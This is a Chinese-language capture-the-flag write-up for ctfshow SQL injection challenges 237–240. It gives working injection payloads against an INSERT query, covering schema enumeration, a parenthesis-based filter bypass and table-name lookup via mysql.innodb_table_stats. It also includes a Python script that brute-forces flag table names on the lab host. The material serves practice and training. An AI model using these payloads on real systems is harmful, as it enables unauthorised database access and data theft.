237 无过滤

源码

  1. $sql = "insert into ctfshow_user(username,pass) value('{$username}','{$password}');";

注意

这里做题的时候难点在于找到注入点,前面不是老抱怨找不到注入点吗,其实在网页里面添加一次数据,然后用burpsuit抓包,发现注入的页面在api/insert.php

  1. username=1',(select group_concat(table_name) from information_schema.tables where table_schema=database()))#&password=1
  2. username=123',(select group_concat(column_name) from information_schema.columns where table_schema=database()))#&password=123
  3. username=123',(select group_concat(flagass23s3) from flag))#&password=123

238 过滤空格 (绕过

说是在上一道题目的基础上过滤了空格,但是其实吧/**/,%09,%0c也过滤了
可以用(来绕过

  1. username=1',(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())))#&password=1
  2. username=1',(select(group_concat(column_name))from(information_schema.columns)where(table_schema=database())))#&password=1
  3. username=1',(select(group_concat(flag))from(flagb)))#&password=1

239无列名注入

过滤了or和’和昨天的题目类似
可以用mysql.innodb_table_stats爆表名

  1. username=1',(select(group_concat(table_name))from(mysql.innodb_table_stats)where(database_name=database())))#&password=1

得到表名就去尝试无列名获取flag
但是测试的时候发现*被过滤了,无列名失败

240

没啥好说的直接爆破

  1. import requests
  2. url= "http://702ce6b4-126b-4a22-b0c6-294a7755bf9d.challenge.ctf.show/api/insert.php"
  3. username = "1',(select(group_concat(flag))from({})))#"
  4. for a in 'ab':
  5.     for b in 'ab':
  6.         for c in 'ab':
  7.             for d in 'ab':
  8.                 for e in 'ab':
  9.                     table_name = "flag" + a + b + c + d + e
  10.                     data = {
  11.                         'username' : username.format(table_name),
  12.                         'password' :123
  13.                     }
  14.                     r = requests.post(url = url,data = data)